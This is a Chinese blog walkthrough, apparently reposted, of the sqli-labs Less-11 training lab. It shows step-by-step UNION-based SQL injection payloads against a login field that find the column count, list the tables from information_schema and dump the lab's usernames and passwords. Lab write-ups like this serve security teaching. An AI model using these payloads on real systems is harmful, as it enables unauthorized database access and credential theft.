sqli-labs修炼の道 less-11

本文通过具体案例展示了如何利用SQL注入漏洞获取目标数据库中的敏感信息,包括确定字段数量、联合查询、获取表名及字段名等步骤。

首先判断字段数目

 

Payload语句: admin' order by 2—s

  

正常显示故字段数目大于等于2

 

 

 

Payload语句: admin' order by 3—s

 

显示位置字段,结合前面的所以字段数为2

 

构造联合查询语句Payload发现显示位

 

 

显示位为1,2

Payload: adm' union select 1,2—s

 

注入查询当前用户以及当前数据库

 

 

Payload: adm' union select user(),database()—s

 

 

构造语句显示当前数据库的所有表名:

 

 

表名:emails,referers,uagents,users

Payload: adm' union select group_concat(table_name),database() from information_schema.tables where table_schema='security'—s

 

 

 

我们所需要的信息在users表中故

 

 

字段名: id,username,password

 

我们来查询username,password字段的内容

 

 

Username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

 

 

Username与Password一一对应

Payload: adm' union select group_concat(username),group_concat(password) from users-- s

 

转载于:https://www.cnblogs.com/vincebye/p/7103643.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值